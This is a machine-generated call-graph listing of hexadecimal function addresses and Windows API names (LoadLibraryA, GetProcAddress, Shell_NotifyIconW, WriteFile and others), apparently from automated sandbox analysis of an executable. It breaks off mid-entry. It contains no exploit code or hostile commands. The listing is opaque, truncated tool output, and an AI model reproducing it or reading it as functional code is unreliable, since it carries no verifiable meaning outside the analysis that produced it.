109106->109115 109111 83320 48 API calls 109107->109111 109109 84477 48 API calls 109108->109109 109112 f217d 109109->109112 109113 843b8 _wcscpy 109110->109113 109114 843ff 109111->109114 109112->109106 109118 84477 48 API calls 109113->109118 109291 914a0 109114->109291 109117 f21ab 109115->109117 109117->109117 109118->109105 109119 914a0 48 API calls 109121 8440f 109119->109121 109121->109119 109122 84477 48 API calls 109121->109122 109123 84451 Mailbox 109121->109123 109307 87bef 48 API calls 109121->109307 109122->109121 109123->109014 109125 83c1f 109124->109125 109126 f3ce4 _memset 109124->109126 109833 831b8 109125->109833 109129 f3cf6 GetOpenFileNameW 109126->109129 109128 83c28 109840 83a67 SHGetMalloc 109128->109840 109129->109125 109130 837c0 109129->109130 109130->109017 109130->109026 109132 83c31 109845 83b45 GetFullPathNameW 109132->109845 109921 8a716 109136->109921 109138 83575 109138->109024 109138->109030 109139 83501 109139->109138 109932 821dd 86 API calls 109139->109932 109141 8350a 109141->109138 109933 85460 88 API calls Mailbox 109141->109933 109143 83513 109143->109138 109144 83517 GetFullPathNameW 109143->109144 109145 87e53 48 API calls 109144->109145 109146 83541 109145->109146 109147 87e53 48 API calls 109146->109147 109148 8354e 109147->109148 109149 f66b4 _wcscat 109148->109149 109150 87e53 48 API calls 109148->109150 109150->109138 109152 8310f 109151->109152 109153 f21b0 109151->109153 109936 8318a 109152->109936 109157 83185 109158 82e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 109157->109158 109158->109039 109160 835c3 _memset 109159->109160 109942 838c4 109160->109942 109163 83648 109165 f45c2 Shell_NotifyIconW 109163->109165 109166 83666 Shell_NotifyIconW 109163->109166 109946 838e4 109166->109946 109168 8367b 109168->109040 109170 8e216 109169->109170 109226 8e226 Mailbox 109169->109226 109171 8e670 109170->109171 109170->109226 110124 9ecee 346 API calls 109171->110124 109172 cd520 86 API calls 109172->109226 109174 83842 109174->109017 109230 82b94 Shell_NotifyIconW _memset 109174->109230 109176 8e681 109176->109174 109178 8e68e 109176->109178 109177 8e26c PeekMessageW 109177->109226 110126 9ec33 346 API calls Mailbox 109178->110126 109180 8e695 LockWindowUpdate DestroyWindow GetMessageW 109180->109174 109183 8e6c7 109180->109183 109181 f5b13 Sleep 109181->109226 109185 f62a7 TranslateMessage DispatchMessageW GetMessageW 109183->109185 109184 8e4e7 109184->109174 110125 8322e 16 API calls 109184->110125 109185->109185 109187 f62d7 109185->109187 109187->109174 109188 8e657 PeekMessageW 109188->109226 109189 8e517 timeGetTime 109189->109226 109191 a010a 48 API calls 109191->109226 109192 8c935 48 API calls 109192->109226 109193 8e641 TranslateMessage DispatchMessageW 109193->109188 109194 f5dfc WaitForSingleObject 109198 f5e19 GetExitCodeProcess CloseHandle 109194->109198 109194->109226 109195 8d3d2 48 API calls 109222 f5cce Mailbox 109195->109222 109196 81000 322 API calls 109196->109226 109197 f6147 Sleep 109197->109222 109198->109226 109199 8e6cc timeGetTime 110127 9cf79 49 API calls 109199->110127 109202 f5feb Sleep 109202->109222 109204 f61de GetExitCodeProcess 109207 f620a CloseHandle 109204->109207 109208 f61f4 WaitForSingleObject 109204->109208 109206 9e3a5 timeGetTime 109206->109222 109207->109222 109208->109207 109208->109226 109209 f5cea Sleep 109209->109226 109210 e8a48 108 API calls 109210->109222 109211 81dce 107 API calls 109211->109222 109213 f5cd7 Sleep 109213->109209 109214 f6266 Sleep 109214->109226 109215 9cf79 49 API calls 109215->109226 109217 8caee 48 API calls 109217->109222 109221 8d380 55 API calls 109221->109222 109222->109195 109222->109204 109222->109206 109222->109209 109222->109210 109222->109211 109222->109213 109222->109214 109222->109217 109222->109221 109222->109226 110129 c56dc 49 API calls Mailbox 109222->110129 110130 9cf79 49 API calls 109222->110130 110131 81000 346 API calls 109222->110131 110171 dd12a 50 API calls 109222->110171 110172 c8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 109222->110172 110173 c6f5b 63 API calls 3 library calls 109222->110173 109226->109172 109226->109177 109226->109181 109226->109184 109226->109188 109226->109189 109226->109191 109226->109192 109226->109193 109226->109194 109226->109196 109226->109197 109226->109199 109226->109202 109226->109209 109226->109215 109226->109222 109228 8caee 48 API calls 109226->109228 109229 8d380 55 API calls 109226->109229 109977 8e7e0 109226->109977 109984 8ea00 109226->109984 110034 944e0 109226->110034 110051 8e7b0 346 API calls Mailbox 109226->110051 110052 93680 109226->110052 110122 9f381 TranslateAcceleratorW 109226->110122 110123 9ed1a IsDialogMessageW GetClassLongW 109226->110123 110128 e8b20 48 API calls 109226->110128 110132 8fa40 109226->110132 109228->109226 109229->109226 109230->109017 109231->109024 109232->109035 109233->109049 109234->109054 109235->109050 109236->109050 109238 8d3d2 48 API calls 109237->109238 109239 83c80 109238->109239 109240 8a359 109239->109240 109241 8a366 __ftell_nolock 109240->109241 109242 87e53 48 API calls 109241->109242 109246 8a4cc Mailbox 109241->109246 109244 8a398 109242->109244 109252 8a3ce Mailbox 109244->109252 109308 8a4f6 109244->109308 109245 8a49f 109245->109246 109247 8caee 48 API calls 109245->109247 109246->109064 109248 8a4c0 109247->109248 109312 85b47 48 API calls _memmove 109248->109312 109249 8caee 48 API calls 109249->109252 109252->109245 109252->109246 109252->109249 109253 8a4f6 48 API calls 109252->109253 109311 85b47 48 API calls _memmove 109252->109311 109253->109252 109313 83f9b 109254->109313 109257 834ea 109266 88182 109257->109266 109260 a28ca _free 47 API calls 109262 f34d0 109260->109262 109264 83e39 84 API calls 109262->109264 109263 f34c3 109263->109260 109265 f34d9 109264->109265 109265->109265 109267 a010a 48 API calls 109266->109267 109268 842ad 109267->109268 109268->109069 109270 8d2df 109269->109270 109272 8d30a 109269->109272 109274 8d2e6 109270->109274 109827 8d349 53 API calls 109270->109827 109272->109080 109274->109272 109826 8d349 53 API calls 109274->109826 109276 8449a 109275->109276 109277 84481 109275->109277 109278 87e53 48 API calls 109276->109278 109279 8c935 48 API calls 109277->109279 109280 84347 109278->109280 109279->109280 109281 a1bc7 109280->109281 109282 a1c48 109281->109282 109283 a1bd3 109281->109283 109830 a1c5a 59 API calls 3 library calls 109282->109830 109290 a1bf8 109283->109290 109828 a889e 47 API calls __getptd_noexit 109283->109828 109286 a1c55 109286->109086 109287 a1bdf 109829 a7aa0 8 API calls __mbstowcs_s_l 109287->109829 109289 a1bea 109289->109086 109290->109086 109292 91606 109291->109292 109295 914b2 109291->109295 109292->109121 109294 9156d 109294->109121 109297 a010a 48 API calls 109295->109297 109306 914be 109295->109306 109296 914c9 109296->109294 109300 a010a 48 API calls 109296->109300 109298 f5299 109297->109298 109299 a010a 48 API calls 109298->109299 109305 f52a4 109299->109305 109301 915af 109300->109301 109302 915c2 109301->109302 109831 9d6b4 48 API calls 109301->109831 109302->109121 109304 a010a 48 API calls 109304->109305 109305->109304 109305->109306 109306->109296 109832 8346e 48 API calls 109306->109832 109307->109121 109309 8b8a7 48 API calls 109308->109309 109310 8a501 109309->109310 109310->109244 109311->109252 109312->109246 109378 83f5d 109313->109378 109318 83fc6 LoadLibraryExW 109388 83e78 109318->109388 109319 f5830 109321 83e39 84 API calls 109319->109321 109323 f5837 109321->109323 109325 83e78 3 API calls 109323->109325 109327 f583f 109325->109327 109326 83fed 109326->109327 109328 83ff9 109326->109328 109414 8417d 109327->109414 109330 83e39 84 API calls 109328->109330 109332 834e2 109330->109332 109332->109257 109337 ccc82 109332->109337 109334 f5866 109422 841cb 109334->109422 109336 f5873 109338 841a7 83 API calls 109337->109338 109339 cccf1 109338->109339 109600 cce59 109339->109600 109342 8417d 64 API calls 109343 ccd1e 109342->109343 109344 8417d 64 API calls 109343->109344 109345 ccd2e 109344->109345 109346 8417d 64 API calls 109345->109346 109347 ccd49 109346->109347 109348 8417d 64 API calls 109347->109348 109349 ccd64 109348->109349 109350 841a7 83 API calls 109349->109350 109351 ccd7b 109350->109351 109352 a45ec __crtGetStringTypeA_stat 47 API calls 109351->109352 109353 ccd82 109352->109353 109354 a45ec __crtGetStringTypeA_stat 47 API calls 109353->109354 109355 ccd8c 109354->109355 109356 8417d 64 API calls 109355->109356 109357 ccda0 109356->109357 109358 cc846 GetSystemTimeAsFileTime 109357->109358 109359 ccdb3 109358->109359 109360 ccddd 109359->109360 109361 ccdc8 109359->109361 109363 cce42 109360->109363 109364 ccde3 109360->109364 109362 a28ca _free 47 API calls 109361->109362 109365 ccdce 109362->109365 109367 a28ca _free 47 API calls 109363->109367 109606 cc251 118 API calls __fcloseall 109364->109606 109369 a28ca _free 47 API calls 109365->109369 109368 ccd07 109367->109368 109368->109263 109372 83e39 109368->109372 109369->109368 109370 cce3a 109371 a28ca _free 47 API calls 109370->109371 109371->109368 109373 83e43 109372->109373 109375 83e4a 109372->109375 109607 a4274 109373->109607 109376 83e59 109375->109376 109377 83e6a FreeLibrary 109375->109377 109376->109263 109377->109376 109427 83f20 109378->109427 109381 83f85 109382 83f8d FreeLibrary 109381->109382 109383 83f96 109381->109383 109382->109383 109385 a4129 109383->109385 109435 a413e 109385->109435 109387 83fba 109387->109318 109387->109319 109514 83eb3 109388->109514 109391 83e9f 109393 83ea8 FreeLibrary 109391->109393 109394 83eb1 109391->109394 109393->109394 109395 84010 109394->109395 109396 a010a 48 API calls 109395->109396 109397 84025 109396->109397 109398 84bce 48 API calls 109397->109398 109399 84031 _memmove 109398->109399 109400 8406c 109399->109400 109402 84129 109399->109402 109403 84161 109399->109403 109401 841cb 57 API calls 109400->109401 109409 84075 109401->109409 109522 831f2 CreateStreamOnHGlobal 109402->109522 109533 cd03f 93 API calls 109403->109533 109406 8417d 64 API calls 109406->109409 109408 84109 109408->109326 109409->109406 109409->109408 109410 f5794 109409->109410 109528 841a7 109409->109528 109411 841a7 83 API calls 109410->109411 109412 f57a8 109411->109412 109413 8417d 64 API calls 109412->109413 109413->109408 109415 f587d 109414->109415 109416 8418f 109414->109416 109557 a44ae 109416->109557 109419 cc846 109577 cc6a0 109419->109577 109421 cc85c 109421->109334 109423 f58bf 109422->109423 109424 841da 109422->109424 109582 a4af5 109424->109582 109426 841e2 109426->109336 109431 83f32 109427->109431 109430 83f08 LoadLibraryA GetProcAddress 109430->109381 109432 83f28 109431->109432 109433 83f3b LoadLibraryA 109431->109433 109432->109381 109432->109430 109433->109432 109434 83f4c GetProcAddress 109433->109434 109434->109432 109437 a414a __fcloseall 109435->109437 109436 a415d 109483 a889e 47 API calls __getptd_noexit 109436->109483 109437->109436 109440 a418e 109437->109440 109439 a4162 109484 a7aa0 8 API calls __mbstowcs_s_l 109439->109484 109454 af278 109440->109454 109443 a4193 109444 a41a9 109443->109444 109445 a419c 109443->109445 109447 a41d3 109444->109447 109448 a41b3 109444->109448 109485 a889e 47 API calls __getptd_noexit 109445->109485 109468 af390 109447->109468 109486 a889e 47 API calls __getptd_noexit 109448->109486 109450 a416d __fcloseall @_EH4_CallFilterFunc@8 109450->109387 109455 af284 __fcloseall 109454->109455 109456 a8984 __lock 47 API calls 109455->109456 109466 af292 109456->109466 109457 af302 109488 af387 109457->109488 109458 af309 109493 a7660 47 API calls __crtGetStringTypeA_stat 109458->109493 109461 af37c __fcloseall 109461->109443 109462 af310 109462->109457 109463 af31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 109462->109463 109463->109457 109465 a8a0c __mtinitlocknum 47 API calls 109465->109466 109466->109457 109466->109458 109466->109465 109491 a5ade 48 API calls __lock 109466->109491 109492 a5b48 LeaveCriticalSection LeaveCriticalSection _doexit 109466->109492 109477 af3b0 __wopenfile 109468->109477 109469 af3ca 109498 a889e 47 API calls __getptd_noexit 109469->109498 109471 af585 109471->109469 109475 af5e8 109471->109475 109472 af3cf 109499 a7aa0 8 API calls __mbstowcs_s_l 109472->109499 109474 a41de 109487 a4200 LeaveCriticalSection LeaveCriticalSection _fseek 109474->109487 109495 b7179 109475->109495 109477->109469 109477->109471 109500 a247b 59 API calls 2 library calls 109477->109500 109479 af57e 109479->109471 109501 a247b 59 API calls 2 library calls 109479->109501 109481 af59d 109481->109471 109502 a247b 59 API calls 2 library calls 109481->109502 109483->109439 109484->109450 109485->109450 109486->109450 109487->109450 109494 a8ae8 LeaveCriticalSection 109488->109494 109490 af38e 109490->109461 109491->109466 109492->109466 109493->109462 109494->109490 109503 b6961 109495->109503 109497 b7192 109497->109474 109498->109472 109499->109474 109500->109479 109501->109481 109502->109471 109506 b696d __fcloseall 109503->109506 109504 b697f 109505 a889e __mbstowcs_s_l 47 API calls 109504->109505 109507 b6984 109505->109507 109506->109504 109508 b69b6 109506->109508 109509 a7aa0 __mbstowcs_s_l 8 API calls 109507->109509 109510 b6a28 __wsopen_helper 110 API calls 109508->109510 109513 b698e __fcloseall 109509->109513 109511 b69d3 109510->109511 109512 b69fc __wsopen_helper LeaveCriticalSection 109511->109512 109512->109513 109513->109497 109518 83ec5 109514->109518 109517 83ef0 LoadLibraryA GetProcAddress 109517->109391 109519 83e91 109518->109519 109520 83ece LoadLibraryA 109518->109520 109519->109391 109519->109517 109520->109519 109521 83edf GetProcAddress 109520->109521 109521->109519 109523 83229 109522->109523 109524 8320c FindResourceExW 109522->109524 109523->109400 109524->109523 109525 f57d3 LoadResource 109524->109525 109525->109523 109526 f57e8 SizeofResource 109525->109526 109526->109523 109527 f57fc LockResource 109526->109527 109527->109523 109529 f589d 109528->109529 109530 841b6 109528->109530 109534 a471d 109530->109534 109532 841c4 109532->109409 109533->109400 109538 a4729 __fcloseall 109534->109538 109535 a4737 109547 a889e 47 API calls __getptd_noexit 109535->109547 109537 a475d 109549 a5a9f 109537->109549 109538->109535 109538->109537 109539 a473c 109548 a7aa0 8 API calls __mbstowcs_s_l 109539->109548 109542 a4763 109555 a468e 81 API calls 3 library calls 109542->109555 109544 a4747 __fcloseall 109544->109532 109545 a4772 109556 a4794 LeaveCriticalSection LeaveCriticalSection _fseek 109545->109556 109547->109539 109548->109544 109550 a5aaf 109549->109550 109551 a5ad1 EnterCriticalSection 109549->109551 109550->109551 109552 a5ab7 109550->109552 109553 a5ac7 109551->109553 109554 a8984 __lock 47 API calls 109552->109554 109553->109542 109554->109553 109555->109545 109556->109544 109560 a44c9 109557->109560 109559 841a0 109559->109419 109561 a44d5 __fcloseall 109560->109561 109562 a44eb _memset 109561->109562 109563 a4518 109561->109563 109564 a4510 __fcloseall 109561->109564 109573 a889e 47 API calls __getptd_noexit 109562->109573 109565 a5a9f __lock_file 48 API calls 109563->109565 109564->109559 109566 a451e 109565->109566 109575 a42eb 62 API calls 5 library calls 109566->109575 109568 a4505 109574 a7aa0 8 API calls __mbstowcs_s_l 109568->109574 109571 a4534 109576 a4552 LeaveCriticalSection LeaveCriticalSection _fseek 109571->109576 109573->109568 109574->109564 109575->109571 109576->109564 109580 a40da GetSystemTimeAsFileTime 109577->109580 109579 cc6af 109579->109421 109581 a4108 __aulldiv 109580->109581 109581->109579 109583 a4b01 __fcloseall 109582->109583 109584 a4b0f 109583->109584 109585 a4b24 109583->109585 109596 a889e 47 API calls __getptd_noexit 109584->109596 109586 a5a9f __lock_file 48 API calls 109585->109586 109588 a4b2a 109586->109588 109598 a479c 55 API calls 4 library calls 109588->109598 109589 a4b14 109597 a7aa0 8 API calls __mbstowcs_s_l 109589->109597 109592 a4b35 109599 a4b55 LeaveCriticalSection LeaveCriticalSection _fseek 109592->109599 109594 a4b47 109595 a4b1f __fcloseall 109594->109595 109595->109426 109596->109589 109597->109595 109598->109592 109599->109594 109604 cce6d __tzset_nolock _wcscmp 109600->109604 109601 ccd03 109601->109342 109601->109368 109602 8417d 64 API calls 109602->109604 109603 cc846 GetSystemTimeAsFileTime 109603->109604 109604->109601 109604->109602 109604->109603 109605 841a7 83 API calls 109604->109605 109605->109604 109606->109370 109608 a4280 __fcloseall 109607->109608 109609 a42ac 109608->109609 109610 a4294 109608->109610 109613 a5a9f __lock_file 48 API calls 109609->109613 109617 a42a4 __fcloseall 109609->109617 109636 a889e 47 API calls __getptd_noexit 109610->109636 109612 a4299 109637 a7aa0 8 API calls __mbstowcs_s_l 109612->109637 109615 a42be 109613->109615 109620 a4208 109615->109620 109617->109375 109621 a422b 109620->109621 109622 a4217 109620->109622 109628 a4227 109621->109628 109639 a3914 109621->109639 109679 a889e 47 API calls __getptd_noexit 109622->109679 109624 a421c 109680 a7aa0 8 API calls __mbstowcs_s_l 109624->109680 109638 a42e3 LeaveCriticalSection LeaveCriticalSection _fseek 109628->109638 109632 a4245 109656 af782 109632->109656 109634 a424b 109634->109628 109635 a28ca _free 47 API calls 109634->109635 109635->109628 109636->109612 109637->109617 109638->109617 109640 a394b 109639->109640 109641 a3927 109639->109641 109645 af8e6 109640->109645 109641->109640 109642 a35c3 __ftell_nolock 47 API calls 109641->109642 109643 a3944 109642->109643 109681 abd14 109643->109681 109646 a423f 109645->109646 109647 af8f3 109645->109647 109649 a35c3 109646->109649 109647->109646 109648 a28ca _free 47 API calls 109647->109648 109648->109646 109650 a35cd 109649->109650 109651 a35e2 109649->109651 109787 a889e 47 API calls __getptd_noexit 109650->109787 109651->109632 109653 a35d2 109788 a7aa0 8 API calls __mbstowcs_s_l 109653->109788 109655 a35dd 109655->109632 109657 af78e __fcloseall 109656->109657 109658 af7ae 109657->109658 109659 af796 109657->109659 109660 af82b 109658->109660 109666 af7d8 109658->109666 109804 a886a 47 API calls __getptd_noexit 109659->109804 109808 a886a 47 API calls __getptd_noexit 109660->109808 109663 af79b 109805 a889e 47 API calls __getptd_noexit 109663->109805 109665 af830 109809 a889e 47 API calls __getptd_noexit 109665->109809 109668 ab6a0 ___lock_fhandle 49 API calls 109666->109668 109670 af7de 109668->109670 109669 af838 109810 a7aa0 8 API calls __mbstowcs_s_l 109669->109810 109672 af7fc 109670->109672 109673 af7f1 109670->109673 109806 a889e 47 API calls __getptd_noexit 109672->109806 109789 af84c 109673->109789 109674 af7a3 __fcloseall 109674->109634 109677 af7f7 109807 af823 LeaveCriticalSection __unlock_fhandle 109677->109807 109679->109624 109680->109628 109682 abd20 __fcloseall 109681->109682 109683 abd28 109682->109683 109684 abd40 109682->109684 109779 a886a 47 API calls __getptd_noexit 109683->109779 109685 abdd5 109684->109685 109690 abd72 109684->109690 109784 a886a 47 API calls __getptd_noexit 109685->109784 109687 abd2d 109780 a889e 47 API calls __getptd_noexit 109687->109780 109706 ab6a0 109690->109706 109691 abdda 109785 a889e 47 API calls __getptd_noexit 109691->109785 109692 abd35 __fcloseall 109692->109640 109695 abd78 109697 abd8b 109695->109697 109698 abd9e 109695->109698 109696 abde2 109786 a7aa0 8 API calls __mbstowcs_s_l 109696->109786 109715 abdf6 109697->109715 109781 a889e 47 API calls __getptd_noexit 109698->109781 109702 abd97 109783 abdcd LeaveCriticalSection __unlock_fhandle 109702->109783 109703 abda3 109782 a886a 47 API calls __getptd_noexit 109703->109782 109707 ab6ac __fcloseall 109706->109707 109708 ab6f9 EnterCriticalSection 109707->109708 109710 a8984 __lock 47 API calls 109707->109710 109709 ab71f __fcloseall 109708->109709 109709->109695 109711 ab6d0 109710->109711 109712 ab6db InitializeCriticalSectionAndSpinCount 109711->109712 109713 ab6ed 109711->109713 109712->109713 109714 ab723 ___lock_fhandle LeaveCriticalSection 109713->109714 109714->109708 109716 abe03 __ftell_nolock 109715->109716 109717 abe35 109716->109717 109718 abe5f 109716->109718 109719 abe40 109716->109719 109720 ab4bf __87except 6 API calls 109717->109720 109722 abeb8 109718->109722 109723 abe9c 109718->109723 109721 a886a __dosmaperr 47 API calls 109719->109721 109724 ac61e 109720->109724 109725 abe45 109721->109725 109727 abecf 109722->109727 109731 b05df __lseeki64_nolock 49 API calls 109722->109731 109726 a886a __dosmaperr 47 API calls 109723->109726 109724->109702 109728 a889e __mbstowcs_s_l 47 API calls 109725->109728 109730 abea1 109726->109730 109729 b49a2 __flswbuf 47 API calls 109727->109729 109732 abe4c 109728->109732 109733 abedd 109729->109733 109734 a889e __mbstowcs_s_l 47 API calls 109730->109734 109731->109727 109735 a7aa0 __mbstowcs_s_l 8 API calls 109732->109735 109736 ac1fe 109733->109736 109741 a869d ____lc_codepage_func 47 API calls 109733->109741 109737 abea8 109734->109737 109735->109717 109738 ac56b WriteFile 109736->109738 109739 ac216 109736->109739 109740 a7aa0 __mbstowcs_s_l 8 API calls 109737->109740 109743 ac594 GetLastError 109738->109743 109748 ac1c3 109738->109748 109742 ac30d 109739->109742 109750 ac22c 109739->109750 109740->109717 109744 abf03 GetConsoleMode 109741->109744 109752 ac416 109742->109752 109755 ac318 109742->109755 109743->109748 109744->109736 109746 abf3c 109744->109746 109745 ac5ce 109745->109717 109747 a889e __mbstowcs_s_l 47 API calls 109745->109747 109746->109736 109749 abf4c GetConsoleCP 109746->109749 109753 ac5f6 109747->109753 109748->109717 109748->109745 109754 ac5aa 109748->109754 109749->109748 109756 abf75 109749->109756 109750->109745 109751 ac29c WriteFile 109750->109751 109751->109743 109757 ac2d9 109751->109757 109752->109745 109758 ac48b WideCharToMultiByte 109752->109758 109759 a886a __dosmaperr 47 API calls 109753->109759 109760 ac5b1 109754->109760 109761 ac5c5 109754->109761 109755->109745 109762 ac391 WriteFile 109755->109762 109756->109748 109772 a22a8 __chsize_nolock 57 API calls 109756->109772 109774 b4ea7 59 API calls __chsize_nolock 109756->109774 109775 ac042 WideCharToMultiByte 109756->109775 109777 ac0a9 109756->109777 109757->109748 109757->109750 109771 ac308 109757->109771 109758->109743 109763 ac4d2 109758->109763 109759->109717 109764 a889e __mbstowcs_s_l 47 API calls 109760->109764 109765 a887d __dosmaperr 47 API calls 109761->109765 109762->109743 109766 ac3e0 109762->109766 109763->109748 109763->109752 109767 ac4da WriteFile 109763->109767 109763->109771 109768 ac5b6 109764->109768 109765->109717 109766->109748 109766->109755 109766->109771 109767->109763 109769 ac52d GetLastError 109767->109769 109770 a886a __dosmaperr 47 API calls 109768->109770 109769->109763 109770->109717 109771->109748 109772->109756 109773 b6634 WriteConsoleW CreateFileW __chsize_nolock 109773->109777 109774->109756 109775->109748 109776 ac07d WriteFile 109775->109776 109776->109743 109776->109777 109777->109743 109777->109748 109777->109756 109777->109773 109778 ac0d4 WriteFile 109777->109778 109778->109743 109778->109777 109779->109687 109780->109692 109781->109703 109782->109702 109783->109692 109784->109691 109785->109696 109786->109692 109787->109653 109788->109655 109811 ab957 109789->109811 109791 af8b0 109824 ab8d1 48 API calls 2 library calls 109791->109824 109793 af85a 109793->109791 109795 ab957 __lseek_nolock 47 API calls 109793->109795 109803 af88e 109793->109803 109794 af8b8 109802 af8da 109794->109802 109825 a887d 47 API calls 2 library calls 109794->109825 109797 af885 109795->109797 109796 ab957 __lseek_nolock 47 API calls 109798 af89a CloseHandle 109796->109798 109800 ab957 __lseek_nolock 47 API calls 109797->109800 109798->109791 109801 af8a6 GetLastError 109798->109801 109800->109803 109801->109791 109802->109677 109803->109791 109803->109796 109804->109663 109805->109674 109806->109677 109807->109674 109808->109665 109809->109669 109810->109674 109812 ab962 109811->109812 109813 ab977 109811->109813 109814 a886a __dosmaperr 47 API calls 109812->109814 109815 a886a __dosmaperr 47 API calls 109813->109815 109817 ab99c 109813->109817 109816 ab967 109814->109816 109818 ab9a6 109815->109818 109819 a889e __mbstowcs_s_l 47 API calls 109816->109819 109817->109793 109820 a889e __mbstowcs_s_l 47 API calls 109818->109820 109821 ab96f 109819->109821 109822 ab9ae 109820->109822 109821->109793 109823 a7aa0 __mbstowcs_s_l 8 API calls 109822->109823 109823->109821 109824->109794 109825->109802 109826->109272 109827->109274 109828->109287 109829->109289 109830->109286 109831->109302 109832->109296 109834 f4aa5 GetFullPathNameW 109833->109834 109835 831c7 109833->109835 109838 f4abd 109834->109838 109890 83bcf 109835->109890 109837 831cd GetFullPathNameW 109839 831e7 109837->109839 109838->109838 109839->109128 109841 83a8b SHGetDesktopFolder 109840->109841 109844 83ade 109840->109844 109842 83a99 109841->109842 109841->109844 109843 83ac8 SHGetPathFromIDListW 109842->109843 109842->109844 109843->109844 109844->109132 109850 83ba9 109845->109850 109852 83b72 109845->109852 109846 a1bc7 _W_store_winword 59 API calls 109846->109850 109847 83bcf 48 API calls 109848 83b7d 109847->109848 109894 8197e 109848->109894 109849 f33e5 109850->109846 109850->109849 109850->109852 109852->109847 109854 8197e 48 API calls 109855 83b9f 109854->109855 109856 83dcb 109855->109856 109857 83f9b 136 API calls 109856->109857 109858 83def 109857->109858 109859 f39f9 109858->109859 109861 83f9b 136 API calls 109858->109861 109860 ccc82 122 API calls 109859->109860 109862 f3a0e 109860->109862 109863 83e02 109861->109863 109865 f3a2f 109862->109865 109866 f3a12 109862->109866 109863->109859 109864 83e0a 109863->109864 109867 f3a1a 109864->109867 109868 83e16 109864->109868 109870 a010a 48 API calls 109865->109870 109869 83e39 84 API calls 109866->109869 109916 c757b 87 API calls _wprintf 109867->109916 109915 8bdf0 163 API calls 8 library calls 109868->109915 109869->109867 109879 f3a74 Mailbox 109870->109879 109873 83e2e 109873->109130 109874 f3a28 109874->109865 109875 f3c24 109876 a28ca _free 47 API calls 109875->109876 109877 f3c2c 109876->109877 109878 83e39 84 API calls 109877->109878 109881 f3c35 109878->109881 109879->109875 109879->109881 109887 8caee 48 API calls 109879->109887 109900 8b6d0 109879->109900 109909 8a870 109879->109909 109917 c30ac 48 API calls _memmove 109879->109917 109918 c2fcd 60 API calls 2 library calls 109879->109918 109919 ca525 48 API calls 109879->109919 109884 a28ca _free 47 API calls 109881->109884 109885 83e39 84 API calls 109881->109885 109920 c32b0 86 API calls 4 library calls 109881->109920 109884->109881 109885->109881 109887->109879 109891 83bd9 __NMSG_WRITE 109890->109891 109892 a010a 48 API calls 109891->109892 109893 83bee _wcscpy 109892->109893 109893->109837 109895 81990 109894->109895 109899 819af _memmove 109894->109899 109898 a010a 48 API calls 109895->109898 109896 a010a 48 API calls 109897 819c6 109896->109897 109897->109854 109898->109899 109899->109896 109901 8b789 109900->109901 109905 8b6e3 _memmove 109900->109905 109903 a010a 48 API calls 109901->109903 109902 a010a 48 API calls 109906 8b6ea 109902->109906 109903->109905 109904 8b71b 109904->109879 109905->109902 109906->109904 109907 a010a 48 API calls 109906->109907 109908 8b74d 109907->109908 109908->109879 109910 8a883 109909->109910 109913 8a93d 109909->109913 109911 a010a 48 API calls 109910->109911 109910->109913 109914 8a8c1 109910->109914 109911->109914 109912 a010a 48 API calls 109912->109914 109913->109879 109914->109912 109914->109913 109915->109873 109916->109874 109917->109879 109918->109879 109919->109879 109920->109881 109922 8a72c 109921->109922 109928 8a848 109921->109928 109923 a010a 48 API calls 109922->109923 109922->109928 109924 8a753 109923->109924 109925 a010a 48 API calls 109924->109925 109926 8a7c5 109925->109926 109926->109928 109930 8a870 48 API calls 109926->109930 109931 8b6d0 48 API calls 109926->109931 109934 8ace0 91 API calls 2 library calls 109926->109934 109935 ca3ee 48 API calls 109926->109935 109928->109139 109930->109926 109931->109926 109932->109141 109933->109143 109934->109926 109935->109926 109937 f4ad8 EnumResourceNamesW 109936->109937 109938 831a2 LoadImageW 109936->109938 109939 83118 RegisterClassExW 109937->109939 109938->109939 109940 82f58 GetSysColorBrush RegisterClassExW RegisterWindowMessageW 109939->109940 109941 82fe9 ImageList_Create LoadIconW ImageList_ReplaceIcon 109940->109941 109941->109157 109943 83618 109942->109943 109944 f44d1 109942->109944 109943->109163 109968 c6237 61 API calls _W_store_winword 109943->109968 109944->109943 109945 f44da DestroyIcon 109944->109945 109945->109943 109947 83900 109946->109947 109967 839d5 Mailbox 109946->109967 109969 87b6e 109947->109969 109950 f453f LoadStringW 109954 f4559 109950->109954 109951 8391b 109952 87e53 48 API calls 109951->109952 109953 83930 109952->109953 109953->109954 109956 83941 109953->109956 109975 839e8 48 API calls 2 library calls 109954->109975 109958 839da 109956->109958 109959 8394b 109956->109959 109957 f4564 109962 f4578 109957->109962 109964 83956 _memset _wcscpy 109957->109964 109961 8c935 48 API calls 109958->109961 109974 839e8 48 API calls 2 library calls 109959->109974 109961->109964 109976 839e8 48 API calls 2 library calls 109962->109976 109966 839ba Shell_NotifyIconW 109964->109966 109965 f4586 109966->109967 109967->109168 109968->109163 109970 a010a 48 API calls 109969->109970 109971 87b93 109970->109971 109972 8a6f8 48 API calls 109971->109972 109973 8390e 109972->109973 109973->109950 109973->109951 109974->109964 109975->109957 109976->109965 109978 8e7fd 109977->109978 109979 8e80f 109977->109979 110174 8dcd0 346 API calls 2 library calls 109978->110174 110175 cd520 86 API calls 4 library calls 109979->110175 109981 8e806 109981->109226 109983 f98e8 109983->109983 109985 8ea20 109984->109985 109986 8fa40 346 API calls 109985->109986 109991 8ea89 109985->109991 109988 f9919 109986->109988 109987 f99bc 110179 cd520 86 API calls 4 library calls 109987->110179 109988->109991 110176 cd520 86 API calls 4 library calls 109988->110176 109989 8fa40 346 API calls 110021 8ecd7 Mailbox 109989->110021 109994 8d3d2 48 API calls 109991->109994 110014 8eb18 109991->110014 109991->110021 109992 8d3d2 48 API calls 109995 f9997 109992->109995 109997 f9963 109994->109997 110178 a1b2a 52 API calls __cinit 109995->110178 110177 a1b2a 52 API calls __cinit 109997->110177 109998 8d380 55 API calls 109998->110021 110000 f9d70 110188 de2fb 346 API calls Mailbox 110000->110188 110002 f9e49 110193 cd520 86 API calls 4 library calls 110002->110193 110003 f9dc2 110190 cd520 86 API calls 4 library calls 110003->110190 110004 f9ddf 110191 dc235 346 API calls Mailbox 110004->110191 110008 8342c 48 API calls 110008->110021 110012 f9df7 110033 8ef0c Mailbox 110012->110033 110192 cd520 86 API calls 4 library calls 110012->110192 110013 914a0 48 API calls 110013->110021 110014->109992 110014->110021 110016 8f56f 110016->110033 110189 cd520 86 API calls 4 library calls 110016->110189 110018 8d805 48 API calls 110018->110021 110019 cd520 86 API calls 110019->110021 110020 f9a3c 110182 dd154 